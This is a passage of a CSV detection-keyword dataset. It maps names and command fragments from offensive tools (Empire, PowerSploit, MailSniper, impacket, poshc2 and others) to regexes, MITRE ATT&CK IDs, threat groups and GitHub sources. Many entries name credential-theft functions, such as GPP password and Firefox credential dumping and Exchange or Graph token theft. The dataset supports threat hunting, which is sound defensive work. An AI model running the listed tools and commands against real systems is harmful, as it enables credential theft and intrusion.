T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetDomainSPNTickets(*",".{0,1000}GetDomainSPNTickets\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - 
T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Get-DomainUser -TrustedToAuth | select userprincipalname",".{0,1000}Get\-DomainUser\s\-TrustedToAuth\s\|\sselect\suserprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainUserList -Domain * -RemoveDisabled *",".{0,1000}Get\-DomainUserList\s\-Domain\s.{0,1000}\s\-RemoveDisabled\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*Get-DXWebcamVideo.ps1*",".{0,1000}Get\-DXWebcamVideo\.ps1.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","79","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" "*Get-ExchangeAccessToken*",".{0,1000}Get\-ExchangeAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-ExoPsAccessToken*",".{0,1000}Get\-ExoPsAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*getExploit.py*",".{0,1000}getExploit\.py.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*getexploitablesystem*",".{0,1000}getexploitablesystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ExploitableUnquotedPath*",".{0,1000}Get\-ExploitableUnquotedPath.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-FakeServiceUsers*",".{0,1000}Get\-FakeServiceUsers.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Get-FileContentsWMImplant*",".{0,1000}Get\-FileContentsWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Get-FireFoxHistory*",".{0,1000}Get\-FireFoxHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-FoxDump*",".{0,1000}Get\-FoxDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetFullPrivsClient.exe*",".{0,1000}GetFullPrivsClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*GetFullPrivsDrv_x64.sys*",".{0,1000}GetFullPrivsDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Get-GPOEnum*",".{0,1000}Get\-GPOEnum.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPOsPerOU*",".{0,1000}Get\-GPOsPerOU.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPOtoFile*",".{0,1000}Get\-GPOtoFile.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getgppgroups *",".{0,1000}getgppgroups\s\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-GPPInnerFields*",".{0,1000}Get\-GPPInnerFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getgpppassword *",".{0,1000}getgpppassword\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 
Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-GPPPassword -*",".{0,1000}Get\-GPPPassword\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-GPPPassword.*",".{0,1000}Get\-GPPPassword\..{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPPPassword.json*",".{0,1000}Get\-GPPPassword\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-GPPPassword.py*",".{0,1000}Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-GraphTokens*",".{0,1000}Get\-GraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Authenticate as a user to Microsoft Graph","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-GroupMembers -GroupName ""Account Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Account\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Domain Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Domain\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
